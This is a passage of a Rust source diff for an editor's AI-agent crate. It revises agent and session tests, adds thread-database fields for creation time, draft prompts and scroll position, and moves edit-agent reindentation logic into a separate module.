fs.insert_file("/a/.rules", Vec::new()).await; cx.run_until_parked(); agent.read_with(cx, |agent, cx| { + let project_id = project.entity_id(); + let state = agent.projects.get(&project_id).unwrap(); let rules_entry = worktree .read(cx) .entry_for_path(rel_path(".rules")) .unwrap(); + let expected_worktrees = vec![WorktreeContext { + root_name: "a".into(), + abs_path: Path::new("/a").into(), + rules_file: Some(RulesFileContext { + path_in_worktree: rel_path(".rules").into(), + text: "".into(), + project_entry_id: rules_entry.id.to_usize(), + }), + }]; + assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees); assert_eq!( - agent.project_context.read(cx).worktrees, - vec![WorktreeContext { - root_name: "a".into(), - abs_path: Path::new("/a").into(), - rules_file: Some(RulesFileContext { - path_in_worktree: rel_path(".rules").into(), - text: "".into(), - project_entry_id: rules_entry.id.to_usize() - }) - }] - ) + thread.read(cx).project_context().read(cx).worktrees, + expected_worktrees + ); }); } @@ -1969,23 +2222,19 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let connection = NativeAgentConnection( - NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(), - ); + let connection = + NativeAgentConnection(cx.update(|cx| { + NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx) + })); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2049,22 +2298,18 @@ mod internal_tests { let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create the agent and connection - let agent = NativeAgent::new( 
- project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread/session let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2150,21 +2395,17 @@ mod internal_tests { let project = Project::test(fs.clone(), [], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store, - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); let acp_thread = cx .update(|cx| { - Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx) + Rc::new(connection.clone()).new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2235,6 +2476,61 @@ mod internal_tests { }); } + #[gpui::test] + async fn test_summarization_model_survives_transient_registry_clearing( + cx: &mut TestAppContext, + ) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/", json!({ "a": {} })).await; + let project = Project::test(fs.clone(), [], cx).await; + + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) + }) + .await + 
.unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "session should have a summarization model from the test registry" + ); + }); + + // Simulate what happens during a provider blip: + // update_active_language_model_from_settings calls set_default_model(None) + // when it can't resolve the model, clearing all fallbacks. + cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry.set_default_model(None, cx); + }); + }); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _| { + assert!( + thread.summarization_model().is_some(), + "summarization model should survive a transient default model clearing" + ); + }); + } + #[gpui::test] async fn test_loaded_thread_preserves_thinking_enabled(cx: &mut TestAppContext) { init_test(cx); @@ -2242,16 +2538,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a thinking model. @@ -2278,9 +2567,11 @@ mod internal_tests { // Create a thread and select the thinking model. 
let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2325,7 +2616,9 @@ mod internal_tests { // Reload the thread and verify thinking_enabled is still true. let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2348,16 +2641,9 @@ mod internal_tests { fs.insert_tree("/", json!({ "a": {} })).await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); // Register a model where id() != name(), like real Anthropic models @@ -2385,9 +2671,11 @@ mod internal_tests { // Create a thread and select the model. let acp_thread = cx .update(|cx| { - connection - .clone() - .new_session(project.clone(), Path::new("/a"), cx) + connection.clone().new_session( + project.clone(), + PathList::new(&[Path::new("/a")]), + cx, + ) }) .await .unwrap(); @@ -2432,7 +2720,9 @@ mod internal_tests { // Reload the thread and verify the model was preserved. 
let reloaded_acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); let reloaded_thread = agent.read_with(cx, |agent, _| { @@ -2467,23 +2757,16 @@ mod internal_tests { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -2523,6 +2806,13 @@ mod internal_tests { cx.run_until_parked(); model.send_last_completion_stream_text_chunk("Lorem."); + model.send_last_completion_stream_event(LanguageModelCompletionEvent::UsageUpdate( + language_model::TokenUsage { + input_tokens: 150, + output_tokens: 75, + ..Default::default() + }, + )); model.end_last_completion_stream(); cx.run_until_parked(); summary_model @@ -2552,6 +2842,24 @@ mod internal_tests { cx.run_until_parked(); + // Set a draft prompt with rich content blocks and scroll position + // AFTER run_until_parked, so the only save that captures these + // changes is the one performed by close_session itself. 
+ let draft_blocks = vec![ + acp::ContentBlock::Text(acp::TextContent::new("Check out ")), + acp::ContentBlock::ResourceLink(acp::ResourceLink::new("b.md", uri.to_string())), + acp::ContentBlock::Text(acp::TextContent::new(" please")), + ]; + acp_thread.update(cx, |thread, _cx| { + thread.set_draft_prompt(Some(draft_blocks.clone())); + }); + thread.update(cx, |thread, _cx| { + thread.set_ui_scroll_position(Some(gpui::ListOffset { + item_ix: 5, + offset_in_item: gpui::px(12.5), + })); + }); + // Close the session so it can be reloaded from disk. cx.update(|cx| connection.clone().close_session(&session_id, cx)) .await @@ -2571,7 +2879,9 @@ mod internal_tests { )] ); let acp_thread = agent - .update(cx, |agent, cx| agent.open_thread(session_id.clone(), cx)) + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) .await .unwrap(); acp_thread.read_with(cx, |thread, cx| { @@ -2589,6 +2899,174 @@ mod internal_tests { "} ) }); + + // Ensure the draft prompt with rich content blocks survived the round-trip. + acp_thread.read_with(cx, |thread, _| { + assert_eq!(thread.draft_prompt(), Some(draft_blocks.as_slice())); + }); + + // Ensure token usage survived the round-trip. + acp_thread.read_with(cx, |thread, _| { + let usage = thread + .token_usage() + .expect("token usage should be restored after reload"); + assert_eq!(usage.input_tokens, 150); + assert_eq!(usage.output_tokens, 75); + }); + + // Ensure scroll position survived the round-trip. 
+ acp_thread.read_with(cx, |thread, _| { + let scroll = thread + .ui_scroll_position() + .expect("scroll position should be restored after reload"); + assert_eq!(scroll.item_ix, 5); + assert_eq!(scroll.offset_in_item, gpui::px(12.5)); + }); + } + + #[gpui::test] + async fn test_close_session_saves_thread(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/", + json!({ + "a": { + "file.txt": "hello" + } + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + let model = Arc::new(FakeLanguageModel::default()); + thread.update(cx, |thread, cx| { + thread.set_model(model.clone(), cx); + }); + + // Send a message so the thread is non-empty (empty threads aren't saved). + let send = acp_thread.update(cx, |thread, cx| thread.send(vec!["hello".into()], cx)); + let send = cx.foreground_executor().spawn(send); + cx.run_until_parked(); + + model.send_last_completion_stream_text_chunk("world"); + model.end_last_completion_stream(); + send.await.unwrap(); + cx.run_until_parked(); + + // Set a draft prompt WITHOUT calling run_until_parked afterwards. + // This means no observe-triggered save has run for this change. + // The only way this data gets persisted is if close_session + // itself performs the save. 
+ let draft_blocks = vec![acp::ContentBlock::Text(acp::TextContent::new( + "unsaved draft", + ))]; + acp_thread.update(cx, |thread, _cx| { + thread.set_draft_prompt(Some(draft_blocks.clone())); + }); + + // Close the session immediately — no run_until_parked in between. + cx.update(|cx| connection.clone().close_session(&session_id, cx)) + .await + .unwrap(); + cx.run_until_parked(); + + // Reopen and verify the draft prompt was saved. + let reloaded = agent + .update(cx, |agent, cx| { + agent.open_thread(session_id.clone(), project.clone(), cx) + }) + .await + .unwrap(); + reloaded.read_with(cx, |thread, _| { + assert_eq!( + thread.draft_prompt(), + Some(draft_blocks.as_slice()), + "close_session must save the thread; draft prompt was lost" + ); + }); + } + + #[gpui::test] + async fn test_rapid_title_changes_do_not_loop(cx: &mut TestAppContext) { + // Regression test: rapid title changes must not cause a propagation loop + // between Thread and AcpThread via handle_thread_title_updated. 
+ init_test(cx); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/", json!({ "a": {} })).await; + let project = Project::test(fs.clone(), [], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + + let title_updated_count = Rc::new(std::cell::RefCell::new(0usize)); + cx.update(|cx| { + let count = title_updated_count.clone(); + cx.subscribe( + &thread, + move |_entity: Entity, _event: &TitleUpdated, _cx: &mut App| { + let new_count = { + let mut count = count.borrow_mut(); + *count += 1; + *count + }; + assert!( + new_count <= 2, + "TitleUpdated fired {new_count} times; \ + title updates are looping" + ); + }, + ) + .detach(); + }); + + thread.update(cx, |thread, cx| thread.set_title("first".into(), cx)); + thread.update(cx, |thread, cx| thread.set_title("second".into(), cx)); + + cx.run_until_parked(); + + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("second".into())); + }); + acp_thread.read_with(cx, |acp_thread, _| { + assert_eq!(acp_thread.title(), Some("second".into())); + }); + + assert_eq!(*title_updated_count.borrow(), 2); } fn thread_entries( diff --git a/crates/agent/src/db.rs b/crates/agent/src/db.rs index 5a14e920e52c18fb6341e09fa9f747b3c5019f1d..bde07a040869bf11a1b95bf433bf6af1e2d0a932 100644 --- a/crates/agent/src/db.rs +++ b/crates/agent/src/db.rs @@ -25,18 +25,31 @@ pub type DbMessage = crate::Message; pub type DbSummary = crate::legacy_thread::DetailedSummaryState; 
pub type DbLanguageModel = crate::legacy_thread::SerializedLanguageModel; -#[derive(Debug, Clone, Serialize, Deserialize)] +#[derive(Debug, Clone)] pub struct DbThreadMetadata { pub id: acp::SessionId, pub parent_session_id: Option, - #[serde(alias = "summary")] pub title: SharedString, pub updated_at: DateTime, + pub created_at: Option>, /// The workspace folder paths this thread was created against, sorted /// lexicographically. Used for grouping threads by project in the sidebar. pub folder_paths: PathList, } +impl From<&DbThreadMetadata> for acp_thread::AgentSessionInfo { + fn from(meta: &DbThreadMetadata) -> Self { + Self { + session_id: meta.id.clone(), + work_dirs: Some(meta.folder_paths.clone()), + title: Some(meta.title.clone()), + updated_at: Some(meta.updated_at), + created_at: meta.created_at, + meta: None, + } + } +} + #[derive(Debug, Serialize, Deserialize)] pub struct DbThread { pub title: SharedString, @@ -64,6 +77,16 @@ pub struct DbThread { pub thinking_enabled: bool, #[serde(default)] pub thinking_effort: Option, + #[serde(default)] + pub draft_prompt: Option>, + #[serde(default)] + pub ui_scroll_position: Option, +} + +#[derive(Debug, Clone, Copy, PartialEq, Serialize, Deserialize)] +pub struct SerializedScrollPosition { + pub item_ix: usize, + pub offset_in_item: f32, } #[derive(Debug, Clone, Serialize, Deserialize)] @@ -105,6 +128,8 @@ impl SharedThread { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, } } @@ -282,6 +307,8 @@ impl DbThread { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, }) } } @@ -394,6 +421,17 @@ impl ThreadsDatabase { s().ok(); } + if let Ok(mut s) = connection.exec(indoc! {" + ALTER TABLE threads ADD COLUMN created_at TEXT; + "}) + { + if s().is_ok() { + connection.exec(indoc! 
{" + UPDATE threads SET created_at = updated_at WHERE created_at IS NULL + "})?()?; + } + } + let db = Self { executor, connection: Arc::new(Mutex::new(connection)), @@ -444,8 +482,22 @@ impl ThreadsDatabase { let data_type = DataType::Zstd; let data = compressed; - let mut insert = connection.exec_bound::<(Arc, Option>, Option, Option, String, String, DataType, Vec)>(indoc! {" - INSERT OR REPLACE INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data) VALUES (?, ?, ?, ?, ?, ?, ?, ?) + // Use the thread's updated_at as created_at for new threads. + // This ensures the creation time reflects when the thread was conceptually + // created, not when it was saved to the database. + let created_at = updated_at.clone(); + + let mut insert = connection.exec_bound::<(Arc, Option>, Option, Option, String, String, DataType, Vec, String)>(indoc! {" + INSERT INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data, created_at) + VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9) + ON CONFLICT(id) DO UPDATE SET + parent_id = excluded.parent_id, + folder_paths = excluded.folder_paths, + folder_paths_order = excluded.folder_paths_order, + summary = excluded.summary, + updated_at = excluded.updated_at, + data_type = excluded.data_type, + data = excluded.data "})?; insert(( @@ -457,6 +509,7 @@ impl ThreadsDatabase { updated_at, data_type, data, + created_at, ))?; Ok(()) @@ -469,14 +522,14 @@ impl ThreadsDatabase { let connection = connection.lock(); let mut select = connection - .select_bound::<(), (Arc, Option>, Option, Option, String, String)>(indoc! {" - SELECT id, parent_id, folder_paths, folder_paths_order, summary, updated_at FROM threads ORDER BY updated_at DESC + .select_bound::<(), (Arc, Option>, Option, Option, String, String, Option)>(indoc! 
{" + SELECT id, parent_id, folder_paths, folder_paths_order, summary, updated_at, created_at FROM threads ORDER BY updated_at DESC, created_at DESC "})?; let rows = select(())?; let mut threads = Vec::new(); - for (id, parent_id, folder_paths, folder_paths_order, summary, updated_at) in rows { + for (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, created_at) in rows { let folder_paths = folder_paths .map(|paths| { PathList::deserialize(&util::path_list::SerializedPathList { @@ -485,11 +538,18 @@ impl ThreadsDatabase { }) }) .unwrap_or_default(); + let created_at = created_at + .as_deref() + .map(DateTime::parse_from_rfc3339) + .transpose()? + .map(|dt| dt.with_timezone(&Utc)); + threads.push(DbThreadMetadata { id: acp::SessionId::new(id), parent_session_id: parent_id.map(acp::SessionId::new), title: summary.into(), updated_at: DateTime::parse_from_rfc3339(&updated_at)?.with_timezone(&Utc), + created_at, folder_paths, }); } @@ -632,11 +692,13 @@ mod tests { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, } } #[gpui::test] - async fn test_list_threads_orders_by_updated_at(cx: &mut TestAppContext) { + async fn test_list_threads_orders_by_created_at(cx: &mut TestAppContext) { let database = ThreadsDatabase::new(cx.executor()).unwrap(); let older_id = session_id("thread-a"); @@ -697,6 +759,10 @@ mod tests { entries[0].updated_at, Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap() ); + assert!( + entries[0].created_at.is_some(), + "created_at should be populated" + ); } #[test] @@ -715,6 +781,22 @@ mod tests { ); } + #[test] + fn test_draft_prompt_defaults_to_none() { + let json = r#"{ + "title": "Old Thread", + "messages": [], + "updated_at": "2024-01-01T00:00:00Z" + }"#; + + let db_thread: DbThread = serde_json::from_str(json).expect("Failed to deserialize"); + + assert!( + db_thread.draft_prompt.is_none(), + "Legacy threads without draft_prompt field should default to None" + ); + } 
+ #[gpui::test] async fn test_subagent_context_roundtrips_through_save_load(cx: &mut TestAppContext) { let database = ThreadsDatabase::new(cx.executor()).unwrap(); @@ -798,7 +880,6 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert_eq!(threads[0].folder_paths, folder_paths); } #[gpui::test] @@ -818,6 +899,54 @@ mod tests { let threads = database.list_threads().await.unwrap(); assert_eq!(threads.len(), 1); - assert!(threads[0].folder_paths.is_empty()); + } + + #[test] + fn test_scroll_position_defaults_to_none() { + let json = r#"{ + "title": "Old Thread", + "messages": [], + "updated_at": "2024-01-01T00:00:00Z" + }"#; + + let db_thread: DbThread = serde_json::from_str(json).expect("Failed to deserialize"); + + assert!( + db_thread.ui_scroll_position.is_none(), + "Legacy threads without scroll_position field should default to None" + ); + } + + #[gpui::test] + async fn test_scroll_position_roundtrips_through_save_load(cx: &mut TestAppContext) { + let database = ThreadsDatabase::new(cx.executor()).unwrap(); + + let thread_id = session_id("thread-with-scroll"); + + let mut thread = make_thread( + "Thread With Scroll", + Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(), + ); + thread.ui_scroll_position = Some(SerializedScrollPosition { + item_ix: 42, + offset_in_item: 13.5, + }); + + database + .save_thread(thread_id.clone(), thread, PathList::default()) + .await + .unwrap(); + + let loaded = database + .load_thread(thread_id) + .await + .unwrap() + .expect("thread should exist"); + + let scroll = loaded + .ui_scroll_position + .expect("scroll_position should be restored"); + assert_eq!(scroll.item_ix, 42); + assert!((scroll.offset_in_item - 13.5).abs() < f32::EPSILON); } } diff --git a/crates/agent/src/edit_agent.rs b/crates/agent/src/edit_agent.rs index 288a3178f3c4501ae9de65d19624b66cbda2548d..afaa124de066d92e5a1d1a1670f762017f086d01 100644 --- a/crates/agent/src/edit_agent.rs +++ 
b/crates/agent/src/edit_agent.rs @@ -1,13 +1,13 @@ mod create_file_parser; mod edit_parser; -#[cfg(test)] +#[cfg(all(test, feature = "unit-eval"))] mod evals; +pub mod reindent; pub mod streaming_fuzzy_matcher; use crate::{Template, Templates}; use action_log::ActionLog; use anyhow::Result; -use cloud_llm_client::CompletionIntent; use create_file_parser::{CreateFileParser, CreateFileParserEvent}; pub use edit_parser::EditFormat; use edit_parser::{EditParser, EditParserEvent, EditParserMetrics}; @@ -20,13 +20,14 @@ use futures::{ use gpui::{AppContext, AsyncApp, Entity, Task}; use language::{Anchor, Buffer, BufferSnapshot, LineIndent, Point, TextBufferSnapshot}; use language_model::{ - LanguageModel, LanguageModelCompletionError, LanguageModelRequest, LanguageModelRequestMessage, - LanguageModelToolChoice, MessageContent, Role, + CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelRequest, + LanguageModelRequestMessage, LanguageModelToolChoice, MessageContent, Role, }; use project::{AgentLocation, Project}; +use reindent::{IndentDelta, Reindenter}; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; -use std::{cmp, iter, mem, ops::Range, pin::Pin, sync::Arc, task::Poll}; +use std::{mem, ops::Range, pin::Pin, sync::Arc, task::Poll}; use streaming_diff::{CharOperation, StreamingDiff}; use streaming_fuzzy_matcher::StreamingFuzzyMatcher; @@ -82,6 +83,7 @@ pub struct EditAgent { templates: Arc, edit_format: EditFormat, thinking_allowed: bool, + update_agent_location: bool, } impl EditAgent { @@ -92,6 +94,7 @@ impl EditAgent { templates: Arc, edit_format: EditFormat, allow_thinking: bool, + update_agent_location: bool, ) -> Self { EditAgent { model, @@ -100,6 +103,7 @@ impl EditAgent { templates, edit_format, thinking_allowed: allow_thinking, + update_agent_location, } } @@ -168,15 +172,17 @@ impl EditAgent { ) -> Result<()> { let buffer_id = cx.update(|cx| { let buffer_id = buffer.read(cx).remote_id(); - self.project.update(cx, 
|project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::min_for_buffer(buffer_id), - }), - cx, - ) - }); + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: language::Anchor::min_for_buffer(buffer_id), + }), + cx, + ) + }); + } buffer_id }); @@ -188,15 +194,17 @@ impl EditAgent { .ok() }; let set_agent_location = |cx: &mut _| { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer(buffer_id), - }), - cx, - ) - }) + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: language::Anchor::max_for_buffer(buffer_id), + }), + cx, + ) + }) + } }; let mut first_chunk = true; while let Some(event) = parse_rx.next().await { @@ -300,15 +308,17 @@ impl EditAgent { if let Some(old_range) = old_range { let old_range = snapshot.anchor_before(old_range.start) ..snapshot.anchor_before(old_range.end); - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: old_range.end, - }), - cx, - ); - }); + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: old_range.end, + }), + cx, + ); + }); + } output_events .unbounded_send(EditAgentOutputEvent::ResolvingEditRange(old_range)) .ok(); @@ -364,13 +374,13 @@ impl EditAgent { buffer.edit(edits.iter().cloned(), None, cx); let max_edit_end = buffer .summaries_for_anchors::( - edits.iter().map(|(range, _)| &range.end), + edits.iter().map(|(range, _)| range.end), ) .max() .unwrap(); let min_edit_start = buffer .summaries_for_anchors::( - 
edits.iter().map(|(range, _)| &range.start), + edits.iter().map(|(range, _)| range.start), ) .min() .unwrap(); @@ -381,15 +391,17 @@ impl EditAgent { }); self.action_log .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: max_edit_end, - }), - cx, - ); - }); + if self.update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: max_edit_end, + }), + cx, + ); + }); + } (min_edit_start, max_edit_end) }); output_events @@ -553,15 +565,8 @@ impl EditAgent { let compute_edits = cx.background_spawn(async move { let buffer_start_indent = snapshot .line_indent_for_row(snapshot.offset_to_point(resolved_old_text.range.start).row); - let indent_delta = if buffer_start_indent.tabs > 0 { - IndentDelta::Tabs( - buffer_start_indent.tabs as isize - resolved_old_text.indent.tabs as isize, - ) - } else { - IndentDelta::Spaces( - buffer_start_indent.spaces as isize - resolved_old_text.indent.spaces as isize, - ) - }; + let indent_delta = + reindent::compute_indent_delta(buffer_start_indent, resolved_old_text.indent); let old_text = snapshot .text_for_range(resolved_old_text.range.clone()) @@ -608,8 +613,7 @@ impl EditAgent { delta: IndentDelta, mut stream: impl Unpin + Stream>, ) -> impl Stream> { - let mut buffer = String::new(); - let mut in_leading_whitespace = true; + let mut reindenter = Reindenter::new(delta); let mut done = false; futures::stream::poll_fn(move |cx| { while !done { @@ -622,55 +626,10 @@ impl EditAgent { _ => return Poll::Ready(None), }; - buffer.push_str(&chunk); - - let mut indented_new_text = String::new(); - let mut start_ix = 0; - let mut newlines = buffer.match_indices('\n').peekable(); - loop { - let (line_end, is_pending_line) = match newlines.next() { - Some((ix, _)) => (ix, false), - None => (buffer.len(), 
true), - }; - let line = &buffer[start_ix..line_end]; - - if in_leading_whitespace { - if let Some(non_whitespace_ix) = line.find(|c| delta.character() != c) { - // We found a non-whitespace character, adjust - // indentation based on the delta. - let new_indent_len = - cmp::max(0, non_whitespace_ix as isize + delta.len()) as usize; - indented_new_text - .extend(iter::repeat(delta.character()).take(new_indent_len)); - indented_new_text.push_str(&line[non_whitespace_ix..]); - in_leading_whitespace = false; - } else if is_pending_line { - // We're still in leading whitespace and this line is incomplete. - // Stop processing until we receive more input. - break; - } else { - // This line is entirely whitespace. Push it without indentation. - indented_new_text.push_str(line); - } - } else { - indented_new_text.push_str(line); - } - - if is_pending_line { - start_ix = line_end; - break; - } else { - in_leading_whitespace = true; - indented_new_text.push('\n'); - start_ix = line_end + 1; - } - } - buffer.replace_range(..start_ix, ""); - + let mut indented_new_text = reindenter.push(&chunk); // This was the last chunk, push all the buffered content as-is. 
if is_last_chunk { - indented_new_text.push_str(&buffer); - buffer.clear(); + indented_new_text.push_str(&reindenter.finish()); done = true; } @@ -761,28 +720,6 @@ struct ResolvedOldText { indent: LineIndent, } -#[derive(Copy, Clone, Debug)] -enum IndentDelta { - Spaces(isize), - Tabs(isize), -} - -impl IndentDelta { - fn character(&self) -> char { - match self { - IndentDelta::Spaces(_) => ' ', - IndentDelta::Tabs(_) => '\t', - } - } - - fn len(&self) -> isize { - match self { - IndentDelta::Spaces(n) => *n, - IndentDelta::Tabs(n) => *n, - } - } -} - #[cfg(test)] mod tests { use super::*; @@ -1463,6 +1400,7 @@ mod tests { Templates::new(), EditFormat::XmlTags, thinking_allowed, + true, ) } @@ -1581,7 +1519,7 @@ mod tests { stream: &mut UnboundedReceiver, ) -> Vec { let mut events = Vec::new(); - while let Ok(Some(event)) = stream.try_next() { + while let Ok(event) = stream.try_recv() { events.push(event); } events diff --git a/crates/agent/src/edit_agent/evals.rs b/crates/agent/src/edit_agent/evals.rs index cdf6c1c0b3f6440e4827c8b74b47a32d997b092f..ba8b7ed867ea26bcdcdee7f8bf20390c2f9592b3 100644 --- a/crates/agent/src/edit_agent/evals.rs +++ b/crates/agent/src/edit_agent/evals.rs @@ -4,7 +4,7 @@ use crate::{ ListDirectoryTool, ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, }; use Role::*; -use client::{Client, UserStore}; +use client::{Client, RefreshLlmTokenListener, UserStore}; use eval_utils::{EvalOutput, EvalOutputProcessor, OutcomeKind}; use fs::FakeFs; use futures::{FutureExt, future::LocalBoxFuture}; @@ -1423,7 +1423,8 @@ impl EditAgentTest { let client = Client::production(cx); let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); settings::init(cx); - language_model::init(client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); language_models::init(user_store, client.clone(), cx); }); @@ -1469,6 +1470,7 @@ impl EditAgentTest { Templates::new(), edit_format, true, + 
